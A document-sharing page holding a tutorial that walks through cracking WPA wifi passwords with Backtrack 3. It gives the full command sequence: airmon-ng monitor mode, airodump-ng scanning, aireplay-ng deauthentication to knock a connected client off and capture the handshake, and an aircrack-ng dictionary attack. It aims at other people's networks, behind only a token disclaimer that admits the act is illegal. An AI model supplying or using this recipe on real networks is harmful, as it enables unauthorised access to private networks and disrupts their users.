Home
Premium
NEW

Penetration testing WPA

W
Shared by: akshay.bazad
Categories
Tags
-
Stats
views:
161
posted:
5/9/2011
language:
English
pages:
13
Document Sample
scope of work template 
							Here is the key for this guide:
Black text = regular info
Blue text = important notes to remember
Red text = ACTUAL commands you type in
Yellow = extra info behind what you're doing

Standard Disclaimer: Breaking anyone's wifi encryption is illegal even if you do not use their
internet. I take no responsibility for anything you do with this guide. This is meant for
informative purposes only.

There is a major difference between WEP encryption and WPA encryption. That difference is
security. WEP encryption can be broken just about every time. It doesn't matter if:
A. people are on the network or not
B. password is easy like "football" or hard like "anw034n98ns0NG"
C. SKA (Shared Key Authentication) is used or not
Regardless of these factors, WEP encryption can be broken. I've already written a guide for
that. The link to it is in my signature.

IMPORTANT NOTE: WPA, on the other hand, is another story. There are 2 MAJOR factors
that MUST BE PRESENT in order for you to break WPA encryption. They are:
A. There ABSOLUTELY MUST be someone wirelessly connected
B. The password MUST be in your dictionary file

Let's get started.

For this guide, you will need the free linux distribution known as Backtrack 3. It can be
downloaded here:
http://www.remote-exploit.org/backtrack_download.html

IMPORTANT NOTE: Once you download it, burn the iso image to a cd. Don't just drag and
drop the file to the cd and burn it. Actually burn the image file using image burning software
so it will work correctly. ImgBurn is excellent free image burning software. It can be found
here:
http://www.imgburn.com/index.php?act=download

Now put the cd in and reboot your computer. It should automatically begin to load up
Backtrack 3. Pay attention, though, because it will pop up some boot options for only about
4 seconds. I have ALWAYS picked the VESA/KDE option for booting into Backtrack 3. It has
always been the most compatible with the systems I've tested it on. If it doesn't work well
for you, try some of the other boot options.

Once Backtrack 3 loads up, click the little black box that is in the bottom left next to where
the "start button" would be in Windows. This will open up a Konsole window. Go ahead and
open up 2 different Konsole windows. We will need both of them.

In the first Konsole window, type:
ifconfig
This will tell you what you're wireless interfaces are. They will typically be something like
wifi0, ath0, ath1, eth0, eth1, etc.
(mine are wifi0 and ath0) From here on out, when I tell you a command to type in, replace
"ath0" with whatever interface your computer uses.
Once you know your wireless interfaces, type:
airmon-ng stop ath0
then type:
ifconfig wifi0 down
then type:
airmon-ng start wifi0

It should look something like this:
What this did, is it reset your wireless interface and brought it back up in what's called
"monitor mode". This is necessary in order for you to be able to "monitor" the airwaves and
pick up the wireless handshake later on. (you'll learn what a "wireless handshake" is!)
Now type:
airodump-ng ath0

This will start the airodump-ng program that will begin to rapidly list all of the wifi networks
within range of you. Look under the "ENC" heading in this list. This is telling you the type of
encryption that these networks are using. "OPN" means there is no encryption. WEP and
WPA are self explanatory. Look through the networks and zero in on those that are using
WPA encryption.

Now, once you have found your WPA networks, look below into the client list. This is the list
of computers that are using the various networks. The far left set of numbers/letters is the
bssid of the router that they are connected to. Look through these and see if any of these
match the bssid of the network that you want to crack. If none of these match the network
you are trying to break, then come back another day because YOU CANNOT PROCEED
WITHOUT A CLIENT CURRENTLY CONNECTED TO THE NETWORK YOU WANT TO CRACK.

If someone IS on the network you want to break, then congrats because you are one step
closer to your goal.

Here is a picture explaining what you should be looking for:
Now, go to the second Konsole window that you opened earlier. It's time to try and capture
the handshake.
A handshake is the term that relates to what happens when a computer is wirelessly
authenticated on a network. Basically, the computer tells the router it wants to connect, and
then the router and computer compare keys to see if they match up. If they match up, then
the router authenticates the computer and gives it access to the network. This is what we
are after. The key to the network is heavily encrypted in the handshake file. Without the
handshake, we are stuck.

The way that you capture the handshake is to send a signal to the router that will very
briefly disconnect the computer that is already connected. That computer will automatically
try and reconnect with the router and when it does, we will be there monitoring the
airwaves to try and pick up the handshake file. Type this command:
aireplay-ng –deauth 10 -a Mac_of_Router -c Mac_of_Client ath0

What this command will do is send the disconnect command to the router TEN times in a
row. The Mac_of_Router is the bssid of the network. The Mac_of_Client is the mac address
of the currently connected computer. This is all illustrated in the picture below:
While that command is running it should look like this:
If we are successful in capturing the handshake file, the words “WPA Handshake―
should pop up in the top right corner of our first Konsole window. It will look like this:
If you have successfully made it this far, congratulations! Don't get too excited yet though,
the biggest roadblock of all is still ahead. It all comes down to how much effort they put into
their password AND how good your dictionary file is!
IMPORTANT NOTE: I am going to upload my personal dictionary files and provide the links
at the bottom of this tutorial. I have compiled these files from all over the web, deleted
most of the duplicates, and split them into several smaller files so that they could each be
run at different times rather than one massive file that takes up your computer for several
days.

Now that you have the handshake file, you can close one of the Konsole windows and just
use one. The Aircrack-ng program will be used now to test the handshake file against each
entry in your dictionary word lists. However, since Backtrack 3 runs off of a live cd, it is
somewhat slow in testing the keys. (typically around 100-200 words tested per second) I
downloaded the windows version of Aircrack-ng so that I could reboot into Windows and
have it run MUCH faster. (typically testing 400-450 words per second) The windows version
of Aircrack-ng can be found here:

http://www.aircrack-ng.org

Don't worry about it saying you must develop your own dll's and whatnot in order to use the
features of the program. It will run dictionary attacks straight out of the installation so no
extra setup is needed.

Now you can run aircrack-ng straight from Backtrack 3 or save your handshake files to a
flash drive and reboot into windows. If you are wanting to reboot into Windows, your
handshake files are located in one of the two directories that is on the desktop of Backtrack
3. When you are ready, open up the command prompt and navigate to the directory where
Aircrack-ng is located. (In Backtrack 3 you can run aircrack-ng straight from the default
directory of the Konsole window. In Windows, you must navigate to the directory that it is
installed to. You will have to get into the “bin― subfolder of the main Aircrack-ng
directory.) Once you are ready, type this command:

aircrack-ng location-of-handshake -w location-of-dictionary-file

This command starts aircrack-ng, then tells it where to find the handshake file. The “-
w― command is letting it know we are doing a dictionary attack which is followed by the
location of our dictionary file. It will then pop up a list of all networks that had packets
capture in this one file. It will also let you know which networks have verified handshake
files captured. After this command is typed in, you type in the number of the handshake file
you want to crack, and it begins.

Here is a picture of this command in Backtrack 3:
After this is done, you simply sit back and wait. Probably not at your computer either. A
good dictionary file can take hours (or days) to crunch through) I have mine broken down in
a way that each one takes around 5 – 8 hours to run from start to finish. This way I can
leave it running overnight and if it fails, fire up the next list on the next night.

If all is successful with your aircrack-ng command, you will see this screen pop up as it
rapidly tries every password you have against the handshake file. It will look like this:
This about wraps it up for the tutorial. Below are the links to my various dictionary files.

Download Dictionary Files Here

They all range from around 100 mb to 500 mb.
I tried to compress them to be more manageable and easy to download. I'm not posting a
virus scan of all of them. I have good rep and if you won't just test it yourself, then look
elsewhere for your dictionary files.

Post any questions you have and I will try to get to them as I have time.
Don't steal my work without giving me credit.
Related docs
BackTrack 4_Assuring Security by Penetration Testing
Views: 4557  |  Downloads: 13
Penetration Testing
Views: 4  |  Downloads: 0
For The Penetration Tester
Views: 107  |  Downloads: 5
Benefits of Network Penetration Testing
Views: 14  |  Downloads: 0
penetration testing
Views: 262  |  Downloads: 8
Fore With Particular Average (W.P.A.)
Views: 3  |  Downloads: 0
WPA NEWS
Views: 497  |  Downloads: 0
Other docs by akshay.bazad
Penetration testing WPA
Views: 164  |  Downloads: 3
How to sync time in virtualbox
Views: 232  |  Downloads: 0
C Questions
Views: 63  |  Downloads: 1